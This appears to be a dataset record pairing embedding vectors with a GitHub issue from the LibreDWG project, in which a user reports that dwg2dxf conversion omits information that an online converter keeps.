-0.01562780700623989, -0.005521425977349281, -0.007806411944329739, 0.019793225452303886, 0.009679351933300495, -0.004056787118315697, -0.0022643839474767447, -0.007866346277296543, -0.005802366882562637, -0.0010469731641933322, -0.0029236585833132267, 0.018145037814974785, -0.000007477126018784475, -0.024453097954392433, -0.010196282528340816, -0.034342218190431595, 0.0284237302839756, 0.012983216904103756, 0.00520677212625742, -0.006727599073201418, 0.010608329437673092, 0.004835929721593857, -0.0032645335886627436, -0.013867244124412537, -0.02341923676431179, 0.011087802238762379, -0.014676353894174099, -0.003714039223268628, -0.0064878626726567745, 0.01775546744465828, 0.001182761276140809, -0.004940814338624477, -0.0011153355007991195, 0.015942461788654327, -0.002359903883188963, 0.022460291162133217, 0.014054538682103157, -0.0014627657365053892, -0.003030416090041399, 0.01129757147282362, -0.013627507723867893, -0.00739061925560236, -0.021681148558855057, 0.00824093446135521, 0.023928675800561905, -0.0036091546062380075, -0.02783937379717827, 0.0011321919737383723, 0.012144139967858791, 0.012241533026099205, 0.016661670058965683, -0.003363799536600709, -0.000993594410829246, -0.007709019351750612, 0.014998500235378742, 0.006630206014961004, -0.004641144070774317, 0.00865298043936491, -0.010922983288764954, 0.007881329394876957, -0.01886424794793129, -0.008667964488267899, -0.009574467316269875, -0.005367844831198454, -0.022130653262138367, 0.010278692469000816, -0.02419837936758995, -0.015672758221626282, -0.008855258114635944, 0.008465686812996864, -0.00039401964750140905, 0.0032120912801474333, -0.021561279892921448, 0.013837276957929134, 0.004963289946317673, 0.022670060396194458, -0.032334428280591965, -0.0005173995741643012, -0.011132752522826195, -0.02186094969511032, 0.010840574279427528, 0.005146837793290615, -0.004510038532316685, -0.00048368662828579545, -0.005637547932565212, -0.011949353851377964, -0.0010263709118589759, -0.020527416840195656, -0.01997302658855915, 0.010473477654159069, -0.012533711269497871, 0.00017945101717486978, 0.005588851403445005, -0.01182948611676693, -0.026745576411485672, -0.01078813150525093, -0.0019347465131431818, -0.030521422624588013, 0.0011172083904966712, 0.002818773966282606, 0.0041916389018297195, -0.0010385449277237058, -0.00335818063467741, -0.030296670272946358, 0.006251872051507235, 0.01976325735449791, 0.0005815477343276143, 0.015837576240301132, -0.009109977632761002, -0.00922984629869461, 0.006750074215233326, 0.006394215393811464, -0.0193137526512146, -0.0017043750267475843, 0.020107878372073174, -0.015013483352959156, -0.000015027413610368967, -0.012159123085439205, -0.00525921443477273, -0.003854509675875306, 0.035450998693704605, 0.017620615661144257, 0.016332032158970833, 0.013297870755195618, -0.003067875048145652, -0.013013184070587158, 0.01041354425251484, -0.0001963074755622074, -0.016047345474362373, 0.012391367927193642, -0.004131704568862915, 0.01041354425251484, -0.012114172801375389, -0.009057535789906979, -0.007045998703688383, 0.0035604580771178007, 0.02533712610602379, 0.00021527099306695163, -0.0012670436408370733, 0.008255917578935623, 0.016496852040290833, 0.012623612768948078, -0.027539703994989395, -0.0059259808622300625, -0.015448004938662052, 0.009117470122873783, 0.015567873604595661, 0.0022287981119006872, -0.004802216775715351, 0.0034630652517080307, -0.010510936379432678, 0.002474153181537986, 0.008862749673426151, -0.017126159742474556, -0.005176804959774017, 0.014616420492529869, 0.008960142731666565, -0.01615223102271557, 0.021171709522604942, -0.0006133876740932465, 0.0071358997374773026, 0.012136648409068584, 0.009574467316269875, 0.015140843577682972, -0.0016781538724899292, 0.0290830060839653, -0.009634400717914104, -0.011597241275012493, -0.001436544582247734, -0.0006742582190781832, -0.026056334376335144, 0.017650581896305084, -0.0033844017889350653, -0.020452499389648438, -0.0002157392300432548, 0.021456396207213402, 0.034551989287137985, 0.0040605328977108, -0.02169613167643547, 0.012376384809613228, 0.012144139967858791, 0.022325439378619194, -0.014077013358473778, 0.015567873604595661, -0.00010740137804532424, 0.015013483352959156, -0.0038301614113152027, 0.009304763749241829, 0.002505993004888296, -0.010113873519003391, -0.006678902544081211, 0.009072518907487392, 0.01685645617544651, -0.008990109898149967, -0.011170211248099804, 0.024333231151103973, 0.024423131719231606, 0.012458793818950653, 0.02735990099608898, 0.001003895653411746, -0.027284983545541763, -0.004525022115558386, 0.03461192175745964, 0.0004553584149107337, -0.006993556395173073, -0.013889719732105732, 0.01039856020361185, -0.008847766555845737, 0.007701527327299118, 0.005637547932565212, -0.018115071579813957, -0.013380279764533043, 0.00680626230314374, -0.0026970328763127327, 0.00013894870062358677, 0.004967035725712776, 0.014459093101322651, -0.007709019351750612, 0.022909795865416527, 0.006042102817445993, 0.005120616871863604, 0.0045887017622590065, -0.0086979316547513, 0.015597840771079063, 0.005427778698503971, -0.027899308130145073, -0.0037721002008765936, 0.015178302302956581, 0.009169911965727806, 0.006678902544081211, -0.026565775275230408, -0.0042852857150137424, 0.00012829636398237199, -0.006289330776780844, 0.0009041615412570536, -0.007319447584450245, 0.015687741339206696, 0.00564878573641181, 0.037458792328834534, 0.0020527418237179518, 0.0011518577812239528, -0.017740482464432716, 0.009634400717914104, -0.012953249737620354, -0.00890020839869976, -0.016661670058965683, 0.007843870669603348, 0.001608855091035366, 0.015732692554593086, 0.010758164338767529, -0.012773447670042515, 0.0034518276806920767, 0.004004344809800386, -0.02099190652370453, -0.016991307958960533, 0.011777044273912907, 0.004367695190012455, -0.010136349126696587, 0.0012117918813601136, 0.0072295465506613255, -0.012293974868953228, -0.020946955308318138, -0.018354807049036026, -0.007776444777846336, 0.00044693020754493773, -0.0035791874397546053, -0.023928675800561905, 0.0026445905677974224, 0.011379980482161045, 0.02481270395219326, -0.023808807134628296, 0.00541279511526227, 0.025816598907113075, -0.034911591559648514, -0.02882828563451767, -0.01066077221184969, 0.0009088439401239157, -0.01474377978593111, 0.005004494450986385, 0.024348214268684387, 0.0069635892286896706, -0.004304015077650547, 0.003687818069010973, 0.005405303556472063, -0.0013962764060124755, -0.00263522588647902, 0.009986513294279575, 0.0008123875013552606, -0.016182197257876396, -0.009641893208026886, -0.003652232000604272, -0.018354807049036026, -0.00371591211296618, 0.008001198060810566, 0.008285884745419025, 0.011634700931608677, 0.009499548934400082, -0.020167812705039978, -0.02160623110830784, -0.00734192319214344, -0.02476775273680687, -0.007413094863295555, 0.0032495500054210424, 0.006495354231446981, -0.01493107434362173, -0.0009121215553022921, -0.013342821039259434, 0.012646087445318699, 0.0017961490666493773, 0.011027867905795574, -0.006495354231446981, 0.029622411355376244, -0.002131405286490917, 0.005787383299320936, 0.011529816314578056, -0.0016107279807329178, 0.03485165908932686, 0.02329936809837818, -0.020737186074256897, -0.007798920385539532, -0.02764458768069744, 0.007083457428961992, 0.012211565859615803, 0.002414219081401825, -0.015732692554593086, -0.012069222517311573, -0.03886724263429642, 0.006701377686113119, 0.0030322892125695944, -0.034432120621204376, -0.0065103378146886826, -0.011350013315677643, 0.001749325543642044, -0.012226548977196217, 0.02186094969511032, 0.0009458344429731369, 0.018639493733644485, 0.01039856020361185, -0.022565174847841263, 0.009754269383847713, -0.004214114043861628, 0.007686543744057417, -0.004011836368590593, -0.027614621445536613, 0.020647285506129265, 0.016496852040290833, 0.004157925955951214, 0.012870840728282928, -0.007225800771266222, -0.03838776797056198, 0.011896912008523941, 0.0024123461917042732, 0.025951450690627098, -0.0032963736448436975, 0.009005093015730381, 0.014803714118897915, -0.0021969580557197332, 0.012728497385978699, -0.001793339615687728, 0.0033844017889350653, -0.01824992336332798, -0.003116571344435215, -0.014339225366711617, 0.005746178328990936, 0.00709469523280859, -0.02374887280166149, 0.004843421746045351, -0.01562780700623989, -0.005663769319653511, 0.006461641285568476, 0.004341473802924156, 0.02004794403910637, -0.021711114794015884, -0.017785433679819107, -0.015193285420536995, 0.01603236235678196, -0.0009439615532755852, -0.018219955265522003, -0.00940964836627245, -0.0007636910886503756, 0.0016116644255816936, 0.011672159656882286, -0.014878631569445133, -0.005678752902895212, -0.014129456132650375, 0.015155826695263386, -0.011327538639307022, -0.001496478682383895, -0.02460293471813202, 0.014556486159563065, -0.004236589185893536, -0.008922684006392956, -0.001975951250642538, 0.01706622540950775, -0.013365296646952629, -0.010458494536578655, -0.018564576283097267, -0.02986214868724346, 0.014728796668350697, -0.018504641950130463, 0.0025509437546133995, -0.006072069983929396, 0.010848065838217735, 0.018504641950130463, 0.011110277846455574, 0.026296071708202362, 0.011275095865130424, -0.013672458939254284, 0.02153131365776062, 0.02091698907315731, 0.02193586714565754, 0.0012520600575953722, 0.010570870712399483, -0.003929427359253168, -0.017950251698493958, 0.01742582954466343, 0.022490257397294044, 0.01304315123707056, 0.020722202956676483, 0.009814202785491943, 0.01072070561349392, 0.026400955393910408, -0.006851213052868843, 0.009671859443187714, 0.010241233743727207, 0.018234940245747566, -0.009641893208026886, 0.010810607112944126, 0.01004644762724638, 0.0021576264407485723, 0.01935870386660099, 0.0034480816684663296, -0.0058847758919000626, -0.00550644239410758, -0.005877284333109856, -0.002824392868205905, 0.008203474804759026, 0.010915491729974747, 0.00030318208155222237, -0.016781538724899292, 0.005738686770200729, 0.004753520712256432, -0.007281988859176636, 0.005034461617469788, 0.004435120616108179, -0.0017811654834076762, 0.009709318168461323, -0.03022175282239914, 0.030026966705918312, 0.010263708420097828, 0.005502696614712477, -0.010061431676149368, -0.00801618117839098, -0.0046748570166528225, 0.025816598907113075, 0.003824542509391904, -0.029232840985059738, -0.017815401777625084, -0.010982917621731758, 0.005727448966354132, -0.0020059181842952967, -0.0037121661007404327, -0.0026502094697207212, -0.002181974472478032, 0.001489923452027142, -0.005461491644382477, 0.004405153915286064, -0.017830384895205498, 0.018549593165516853, 0.0002114080562023446, -0.003985615447163582, 0.02620616927742958, 0.013747376389801502, -0.002015282865613699, 0.010848065838217735, -0.006693886127322912, 0.030296670272946358, -0.00826340913772583, -0.02046748250722885, -0.006364248692989349, -0.00004140952296438627, -0.001442163484171033, -0.025906499475240707, 0.005158075597137213, -0.007963739335536957, -0.003165267873555422, 0.007933772169053555, 0.009589450433850288, -0.01093047484755516, 0.01877434551715851, -0.02460293471813202, 0.005008240230381489, 0.011724601499736309, 0.013267903588712215, 0.0050756661221385, 0.009806711226701736, -0.008413244038820267, 0.013949654065072536, 0.013987112790346146, 0.0029573715291917324, 0.0008053639903664589, 0.01299820002168417, -0.0007065664394758642, -0.002333682728931308, -0.02231045626103878, -0.006102037150412798, -0.014181897975504398, 0.011275095865130424, 0.02210068702697754, 0.007694035768508911, -0.02419837936758995, 0.01029367558658123, 0.011619716882705688, 0.011672159656882286, -0.009357205592095852, -0.030491456389427185, 0.023434219881892204, -0.014893615618348122, 0.002358030993491411, 0.00044669609633274376, 0.0037290225736796856, -0.002882454078644514, 0.00468609482049942, -0.02243032492697239, 0.007971230894327164, -0.003154030302539468, 0.008098590187728405, 0.015230744145810604, 0.03263409808278084, 0.03038657084107399, -0.003532364033162594, -0.015612823888659477, 0.011245128698647022, 0.01890919730067253, -0.007888820953667164, -0.013537607155740261, -0.015275695361196995, 0.0005211454117670655, -0.006154479458928108, 0.007072219625115395, 0.02759963646531105, 0.018219955265522003, 0.007311956025660038, -0.01648186892271042, -0.014856156893074512, 0.0037870837841182947, 0.003966886084526777, 0.013814802281558514, 0.0238687414675951, -0.0034686841536313295, -0.014414142817258835, 0.005967185366898775, -0.0054952045902609825, -0.0032439313363283873, 0.008435719646513462, 0.005251722410321236, -0.009364698082208633, 0.019118966534733772, 0.024992505088448524, -0.008667964488267899, 0.022205570712685585, 0.006094545125961304, -0.009065027348697186, -0.004978273529559374, 0.019898109138011932, 0.0193137526512146, 0.010997900739312172, 0.008885225281119347, -0.015035958960652351, -0.01747078076004982, 0.018594544380903244, 0.005922234617173672, 0.007203325629234314, 0.009072518907487392, -0.005787383299320936, -0.020332632586359978, 0.00884027499705553, 0.0038207967299968004, 0.023599037900567055, 0.007323193829506636, 0.006562780123203993, -0.020287681370973587, 0.00033993853139691055, 0.01907401718199253, 0.028858251869678497, -0.0006377359386533499, -0.010735689662396908, 0.003094096202403307, 0.010128856636583805, 0.003790829563513398, -0.011207669973373413, 0.017335928976535797, 0.00940964836627245, -0.01400209590792656, 0.0022325438912957907, -0.005899759475141764, 0.00030692797736264765, 0.01265357993543148, -0.008023672737181187, -0.005345369689166546, 0.013792326673865318, 0.010878033004701138, -0.014908598735928535, -0.0004354584380052984, 0.0021857204847037792, -0.009244829416275024, -0.0035192533396184444, 0.006102037150412798, 0.00801618117839098, 0.006652681156992912, -0.010143840685486794, 0.014661370776593685, -0.015043450519442558, 0.011027867905795574, -0.014848664402961731, -0.002215687418356538, 0.0025940213818103075, 0.003596043912693858, -0.0025940213818103075, -0.025681747123599052, -0.018234940245747566, 0.0198082085698843, -0.014256815426051617, 0.002580910688266158, -0.0209619402885437, -0.0020396311301738024, -0.015897510573267937, -0.00253783306106925, 0.015403054654598236, 0.004603685345500708, -0.0056899902410805225, -0.0013635000213980675, -0.020227747038006783, 0.00438642455264926, 0.009986513294279575, 0.014271799474954605, 0.0096568763256073, 0.011342521756887436, -0.00937218964099884, 0.0017530714394524693, -0.018969131633639336, -0.0020377582404762506, 0.015582856722176075, 0.0013457071036100388, 0.01648186892271042, 0.0026614470407366753, -0.002170736901462078, 0.006600238848477602, 0.005540155339986086, 0.007075965404510498, 0.009012585505843163, -0.012631104327738285, -0.010653279721736908, 0.004184146877378225, 0.004326490219682455, -0.012159123085439205, -0.005738686770200729, -0.018189989030361176, -0.006750074215233326, 0.008817799389362335, -0.0016126009868457913, -0.001744643202982843, -0.008960142731666565, 0.03296373784542084, -0.010211266577243805, 0.005907251499593258, 0.012706021778285503, 0.009664367884397507, 0.013365296646952629, -0.016047345474362373, -0.014818697236478329, 0.004611177369952202, -0.018145037814974785, 0.002331809839233756, -0.009154928848147392, -0.006937368307262659, -0.041114769876003265, -0.017530713230371475, 0.010698230937123299, 0.002612750744447112, -0.0062069217674434185, -0.00003128394382656552, 0.005877284333109856, -0.016347017139196396, 0.012915791012346745, 0.013163018971681595, 0.01742582954466343, 0.00845070369541645, -0.009956547059118748, 0.007529216818511486, 0.007667814381420612, 0.018025171011686325, 0.012773447670042515, -0.0027513483073562384, 0.007701527327299118, -0.006105782929807901, 0.013972128741443157, 0.014399159699678421, -0.006701377686113119, -0.01410698052495718, -0.0020527418237179518, -0.029472576454281807, -0.022580159828066826, 0.01115522813051939, 0.0152532197535038, 0.030461488291621208, 0.01000898890197277, -0.0096568763256073, 0.0007974040345288813, -0.013178003020584583, 0.02235540561378002, 0.003951902501285076, 0.011409947648644447, -0.009994005784392357, 0.017440812662243843, -0.009312255308032036, -0.0006934558623470366, -0.005982168950140476, 0.05427029728889465, 0.005203025881201029, 0.027689538896083832, 0.008750373497605324, 0.006461641285568476, -0.005476475227624178, 0.0013325965264812112, -0.0027288729324936867, 0.004292777273803949, -0.002468534279614687, -0.008038656786084175, 0.005772399716079235, 0.01293826662003994, -0.007529216818511486, -0.0031184442341327667, 0.005577614065259695, 0.006607730872929096, -0.002689541084691882, -0.007360652554780245, -0.019793225452303886, -0.024288279935717583, 0.00034438676084391773, 0.02719508297741413, -0.01329037919640541, -0.007296972442418337, -0.002824392868205905, 0.014519027434289455, -0.011994305066764355, 0.006146987434476614, 0.00026314801652915776, 0.03071620874106884, -0.009709318168461323, -0.014047046191990376, -0.006641443818807602, 0.00042515728273428977, 0.01660173572599888, -0.000707502942532301, 0.016706621274352074, 0.01197182945907116, 0.007547946181148291, -0.00019150806474499404, 0.01296074129641056, -0.01591249369084835, 0.00371591211296618, -0.002743856515735388, 0.009874137118458748, -0.012331433594226837, 0.0035454744938760996, 0.01640694960951805, 0.008076115511357784, 0.003678453154861927, 0.0009786109440028667, -0.01299820002168417, 0.004011836368590593, -0.01271351333707571, 0.011170211248099804, 0.0030004491563886404, -0.02750973589718342, -0.011290079914033413, -0.005502696614712477, -0.01669163815677166, -0.006457895506173372, -0.00641669100150466, -0.012084205634891987, -0.01964339055120945, -0.000059231711929896846, 0.01496853306889534, 0.019913094118237495, -0.006289330776780844, 0.02715013176202774, 0.00482843816280365, 0.0045662266202270985, -0.02783937379717827, 0.005480221007019281, -0.012840873561799526, -0.010990409180521965, 0.023059632629156113, 0.007154629100114107, 0.013387772254645824, -0.00039870201726444066, 0.0030285432003438473, -0.00652157561853528, 0.02505243942141533, -0.004097991622984409, 0.003371291095390916, -0.010263708420097828, -0.0039406646974384785, -0.015043450519442558, -0.022325439378619194, 0.013237936422228813, 0.018339823931455612, 0.004757266491651535, -0.014586453326046467, -0.007783936802297831, 0.012728497385978699, -0.0013428976526483893, -0.0029948302544653416, -0.016376983374357224, 0.0024704071693122387, 0.001469321083277464, 0.031315550208091736, 0.01424932386726141, -0.018969131633639336, 0.007162120658904314, 0.02283487841486931, 0.0013110577128827572, 0.00902007706463337, -0.007716510910540819, -0.004809708800166845, 0.01158225815743208, 0.027284983545541763, -0.013148035854101181, -0.016721604391932487, 0.013784835115075111, 0.01579262688755989, 0.008428228087723255, -0.007521725259721279, 0.002614623634144664, 0.013837276957929134, 0.00912496168166399, -0.014608928002417088, -0.021726097911596298, 0.03227449581027031, 0.013492656871676445, 0.012728497385978699, -0.004116720985621214, -0.009132453240454197, 0.022864846512675285, 0.009851662442088127, 0.003996852785348892, -0.01396463718265295, -0.017440812662243843, 0.017171109095215797, 0.0022868590895086527, -0.008675456047058105, 0.009469582699239254, -0.01472130510956049, 0.03718908876180649, 0.01207671407610178, 0.006491608452051878, -0.005944710224866867, 0.06221155822277069, -0.01154479943215847, 0.0012333306949585676, -0.013949654065072536, 0.025936467573046684, -0.011604733765125275, 0.021471379324793816, -0.02592148259282112, -0.006113274488598108, -0.0010020226472988725, 0.021561279892921448, 0.017231043428182602, 0.0002785997639875859, -0.008825290948152542, -0.005098141264170408, 0.0020546147134155035, 0.0047385371290147305, 0.006705123465508223, -0.017995202913880348, 0.01375486794859171, 0.00438642455264926, 0.0015189539408311248, 0.015837576240301132, 0.000556263024918735, 0.00260338606312871, 0.001803640741854906, -0.006266855634748936, 0.020572368055582047, 0.0069411140866577625, -0.03383278101682663, -0.008023672737181187, 0.0019478570902720094, -0.012391367927193642, 0.009199879132211208, 0.02054240182042122, 0.014893615618348122, -0.0035941710229963064, 0.004427629057317972, 0.010076414793729782, 0.013215461745858192, 0.002354284981265664, -0.018070120364427567, 0.01730596087872982, 0.047677550464868546, -0.002133278176188469, -0.0014946057926863432, -0.012264007702469826, 0.010990409180521965, -0.010158823803067207, 0.01382229384034872, -0.008930175565183163, 0.0049970028921961784, 0.003537982702255249, -0.006072069983929396, 0.015088400803506374, 0.0009186768438667059, 0.016781538724899292, 0.021396461874246597, -0.0009463027236051857, -0.002161372220143676, -0.02087203785777092, 0.00011506872397148982, -0.0017568173352628946 ]
231
null
null
null
null
null
null
null
null
null
[ "LibreDWG", "libredwg" ]
Hi, I have attached three files. one original DWG file and two dxf files one converted using libreDWG and other using online converter. The online converted file is having all information where as where as dxf file converted using libredwg is not having all information, some information are missing. Can you please fix it? [file to share.zip](https://github.com/LibreDWG/libredwg/files/7127936/file.to.share.zip)
dwg2dxf conversion is not converting all informations.
https://api.github.com/repos/LibreDWG/libredwg/issues/394/comments
7
2021-09-08T10:04:20
2023-08-03T15:12:53Z
https://github.com/LibreDWG/libredwg/issues/394
990,962,476
394
false
This is a GitHub Issue repo:libredwg owner:LibreDWG Title : dwg2dxf conversion is not converting all informations. Issue date: --- start body --- Hi, I have attached three files. one original DWG file and two dxf files one converted using libreDWG and other using online converter. The online converted file is having all information where as where as dxf file converted using libredwg is not having all information, some information are missing. Can you please fix it? [file to share.zip](https://github.com/LibreDWG/libredwg/files/7127936/file.to.share.zip) --- end body ---
581
[ 0.0051613012328743935, 0.029408173635601997, -0.00379752810113132, -0.0036016672383993864, 0.03400728106498718, 0.05272289365530014, 0.02509923093020916, 0.046600423753261566, -0.037663355469703674, -0.0036016672383993864, -0.01720675639808178, -0.038882046937942505, -0.010395144112408161, -0.013042895123362541, -0.0078489501029253, 0.014174536801874638, 0.0007734698010608554, 0.017612986266613007, 0.015248145908117294, -0.027043333277106285, -0.00011249542149016634, 0.007674851454794407, 0.03676384314894676, 0.041957788169384, -0.006155115086585283, 0.01259313989430666, -0.015538309700787067, -0.0005272833514027297, 0.012034573592245579, -0.0008927093003876507, 0.032440394163131714, 0.020630696788430214, 0.020064877346158028, 0.007352043408900499, 0.028102433308959007, 0.005712613929063082, 0.03867892920970917, 0.051939450204372406, -0.016292737796902657, 0.04062303155660629, -0.02640497125685215, -0.05138813704252243, -0.010373381897807121, 0.02624538168311119, -0.02911800891160965, 0.024011114612221718, -0.010133995674550533, 0.03310777246952057, -0.0275075975805521, 0.01513207983225584, -0.01865757815539837, -0.010112233459949493, -0.029669322073459625, -0.004562837071716785, 0.0010708884801715612, 0.010692562907934189, 0.06232734024524689, 0.04715173318982124, -0.020151926204562187, 0.032411377876996994, 0.016684459522366524, 0.00867591891437769, 0.0011425227858126163, 0.03981057181954384, -0.030090060085058212, 0.01519011240452528, -0.056117817759513855, 0.02382250688970089, -0.04735485091805458, -0.010083217173814774, 0.009510141797363758, 0.005741630680859089, 0.0275801382958889, 0.010170266963541508, 0.03043825924396515, -0.0501694455742836, -0.0007965922704897821, 0.019034791737794876, 0.005288248416036367, -0.0029741863254457712, -0.014152774587273598, 0.023039063438773155, -0.025519968941807747, 0.027159398421645164, -0.013304043561220169, 0.004707919433712959, -0.03824368491768837, -0.057539623230695724, -0.015306178480386734, 0.009437601082026958, -0.005088760517537594, 0.02112397737801075, 0.004301689099520445, -0.040158770978450775, 0.0038120364770293236, -0.030032027512788773, -0.0014426617417484522, 0.004573718179017305, -0.06551914662122726, -0.03560318797826767, -0.0302931759506464, 0.019324956461787224, -0.012810763902962208, -0.0005250164540484548, 0.050546661019325256, 0.006876899395138025, 0.028131449595093727, -0.011824204586446285, 0.04123237729072571, 0.07944704592227936, 0.014392159879207611, 0.005183063913136721, -0.018120774999260902, 0.0006809798651374876, 0.01961512118577957, 0.02359037473797798, 0.007747392635792494, -0.023256685584783554, 0.023126112297177315, 0.008741206489503384, -0.0073339082300662994, -0.044453203678131104, -0.02106594480574131, -0.03325285390019417, -0.03415236249566078, 0.030815472826361656, -0.019266923889517784, -0.024852590635418892, 0.004026032518595457, 0.01256412360817194, -0.048167310655117035, -0.024417344480752945, 0.029263092204928398, 0.0009521023603156209, 0.022864963859319687, 0.011918507516384125, -0.025519968941807747, 0.034848760813474655, -0.015480277128517628, 0.022879472002387047, -0.03789548575878143, -0.054783061146736145, 0.007986778393387794, -0.019397499039769173, -0.022008979693055153, 0.01388437207788229, -0.028160467743873596, 0.0010273638181388378, 0.032295312732458115, -0.014486463740468025, -0.026651611551642418, -0.021588239818811417, 0.018062742426991463, -0.008160877041518688, 0.055943720042705536, -0.005607429426163435, -0.003146471455693245, 0.015349702909588814, -0.00988010223954916, -0.03174399957060814, 0.015378720127046108, -0.004290807992219925, 0.020093893632292747, 0.009212723933160305, -0.026956284418702126, -0.008081082254648209, 0.0058685773983597755, 0.012056335806846619, -0.03264350816607475, 0.024431852623820305, -0.017961183562874794, -0.006575853563845158, 0.021414142102003098, 0.005494990851730108, -0.039897620677948, -0.002772884676232934, -0.027449563145637512, 0.02000684291124344, -0.013674003072082996, -0.011062522418797016, -0.011918507516384125, -0.02517177164554596, -0.014116504229605198, 0.006126098334789276, 0.0223716851323843, -0.03275957331061363, 0.03577728569507599, -0.005106895696371794, -0.04329254850745201, -0.009640716016292572, -0.002674954244866967, 0.006140606477856636, 0.023982098326086998, -0.024170704185962677, 0.011853220872581005, -0.0024609577376395464, -0.03571925312280655, -0.03592236712574959, 0.01460252981632948, -0.006641140673309565, -0.007776409387588501, 0.0173083133995533, -0.014689578674733639, -0.032440394163131714, 0.013565191067755222, 0.02762366272509098, -0.036299582570791245, 0.028203992173075676, -0.01710519939661026, -0.03566122055053711, -0.03339793533086777, -0.011671868152916431, 0.007337535265833139, 0.004327078349888325, -0.01383359357714653, 0.03206317871809006, 0.0052157072350382805, 0.008465549908578396, -0.029712846502661705, -0.0034565848764032125, 0.007725630421191454, -0.04732583463191986, 0.024214228615164757, 0.0017310127150267363, -0.04645533859729767, -0.00391722097992897, -0.0075370236299932, 0.0033876707311719656, -0.013507158495485783, 0.02653554640710354, 0.08188442885875702, -0.050952889025211334, 0.011570310220122337, 0.012963100336492062, -0.04770304635167122, -0.008204401470720768, 0.011563056148588657, -0.013543428853154182, -0.059947989881038666, -0.05138813704252243, 0.009604445658624172, 0.05164928361773491, -0.0066592758521437645, -0.014972489327192307, 0.004392365459352732, 0.014152774587273598, 0.03191809728741646, 0.016365278512239456, 0.02778325229883194, 0.03600941598415375, 0.05162026733160019, -0.0024537036661058664, 0.03148284927010536, 0.006398127879947424, -0.0011180401779711246, -0.0099018644541502, 0.05011141300201416, 0.04079713299870491, -0.05269387736916542, -0.03302072361111641, 0.017903150990605354, -0.009771290235221386, -0.010656291618943214, 0.0015142960473895073, -0.004628124181181192, -0.0020909979939460754, -0.024736525490880013, 0.009357806295156479, -0.00379027402959764, 0.020630696788430214, 0.010895677842199802, -0.02367742545902729, -0.01380457729101181, -0.032469410449266434, -0.03783745318651199, 0.017946675419807434, -0.010997235774993896, -0.0049690674059093, 0.03255645930767059, -0.03827270120382309, -0.00755878584459424, 0.028450630605220795, 0.00189695053268224, 0.008879034779965878, 0.001026456942781806, -0.01608962193131447, -0.011715392582118511, -0.0014145520981401205, -0.013187977485358715, -0.03426843136548996, -0.011026252061128616, -0.027043333277106285, -0.03325285390019417, -0.003231707261875272, -0.024185212329030037, 0.018019216135144234, 0.026027757674455643, -0.018120774999260902, -0.003347773104906082, -0.007127166260033846, 0.0018343838164582849, -0.011570310220122337, 0.014131012372672558, -0.03528400510549545, 0.01126563735306263, 0.028711779043078423, -0.010322602465748787, 0.03676384314894676, -0.015248145908117294, -0.036154501140117645, 0.016669951379299164, 0.0018153417622670531, -0.017990199849009514, 0.012433549389243126, -0.0045483289286494255, -0.0065939887426793575, 0.033659085631370544, -0.0525197796523571, 0.008197147399187088, -0.028102433308959007, -0.011722646653652191, 0.007098149508237839, -0.005596548318862915, 0.011882237158715725, 0.01965864561498165, -0.022096028551459312, -0.018149791285395622, 0.02386603131890297, -0.04230598732829094, 0.018991267308592796, 0.0022251992486417294, -0.004896526224911213, 0.004181995987892151, -0.0010028810938820243, -0.011367195285856724, -0.03011907823383808, -0.014689578674733639, -0.045642878860235214, -0.006956694647669792, -0.05138813704252243, -0.016452329233288765, 0.02505570650100708, -0.017787085846066475, -0.029915962368249893, 0.040187787264585495, -0.036444664001464844, 0.016423311084508896, 0.030873505398631096, 0.028363581746816635, -0.014899948611855507, 0.0008351297583431005, 0.024707509204745293, -0.02385152317583561, 0.03174399957060814, 0.010293586179614067, -0.018773645162582397, -0.003137403866276145, -0.044424187391996384, 0.0031646068673580885, -0.020877337083220482, 0.020427582785487175, -0.011316416785120964, 0.011048014275729656, 0.03705400973558426, -0.004265418276190758, 0.029582273215055466, -0.008305959403514862, 0.004214639775454998, -0.003701411187648773, -0.009016862139105797, 0.008944321423768997, 0.029480716213583946, -0.0347617082297802, -0.018149791285395622, -0.04514959827065468, 0.0007766434573568404, 0.008385755121707916, 0.004301689099520445, -0.005349908489733934, 0.0004028299590572715, -0.03177301585674286, -0.00494005111977458, 0.0125423613935709, -0.035138923674821854, 0.020427582785487175, 0.036357615143060684, 0.004392365459352732, 0.01000342145562172, -0.018033724278211594, -0.024170704185962677, -0.011642851866781712, 0.023010047152638435, 0.016713475808501244, -0.026970792561769485, -0.00858161598443985, 0.057510606944561005, -0.013586954213678837, 0.0009883729508146644, 0.017874134704470634, -0.002863561036065221, -0.01252059917896986, -0.0007603217381983995, 0.011497769504785538, 0.0099018644541502, 0.013688511215150356, 0.0340362973511219, 0.012709205970168114, -0.01566888391971588, 0.015523801557719707, 0.016481345519423485, -0.015581835061311722, 0.008871780708432198, 0.002123641548678279, -0.024765541777014732, 0.007515260949730873, -0.009495633654296398, -0.037721388041973114, 0.03551613911986351, -0.034906793385744095, 0.01829487271606922, 0.01870110258460045, -0.006049930118024349, -0.012404533103108406, 0.0019096452742815018, -0.013260518200695515, -0.028581205755472183, 0.006623005028814077, 0.014870931394398212, 0.068943090736866, -0.026782184839248657, -0.01967315375804901, 0.009546413086354733, 0.03351400047540665, 0.037431225180625916, -0.05669814720749855, 0.008480058051645756, -0.006909542717039585, -0.05440584942698479, 0.003278859192505479, 0.04085516557097435, -0.007486244663596153, 0.03801155090332031, -0.020978894084692, -0.01970217190682888, 0.02124004252254963, -0.008088336326181889, -0.051910433918237686, -0.037750404328107834, 0.020122909918427467, -0.01968766190111637, 0.007914237678050995, 0.03392023220658302, -0.028711779043078423, -0.03722810745239258, -0.005382551811635494, -0.005687224678695202, -0.016176672652363777, -0.015393228270113468, 0.02789931930601597, 0.006155115086585283, -0.00019144057296216488, 0.011715392582118511, -0.037692371755838394, 0.01862856186926365, 0.03798253461718559, 0.01858503744006157, 0.04355369508266449, -0.05634995177388191, 0.006412636023014784, 0.022748898714780807, 0.0022941131610423326, 0.01516109611839056, 0.011534039862453938, -0.004729681648313999, -0.014943473041057587, 0.061282746493816376, -0.01587199978530407, -0.033804167062044144, 0.016771510243415833, -0.024838082492351532, -0.0019404751947149634, -0.03270154073834419, -0.004468533676117659, -0.017671018838882446, -0.011976541019976139, -0.00248816073872149, 0.008175385184586048, -0.012905066832900047, -0.03531302139163017, 0.05803290382027626, 0.012361008673906326, 0.05440584942698479, -0.02112397737801075, -0.0346166267991066, 0.011127809062600136, 0.03206317871809006, 0.012905066832900047, -0.011497769504785538, 0.0501694455742836, 0.0036089213099330664, 0.017496921122074127, 0.005846815183758736, 0.00248634722083807, -0.011113300919532776, 0.058845363557338715, 0.023343736305832863, -0.0183383971452713, 0.03545810282230377, -0.006158742122352123, -0.0451786145567894, 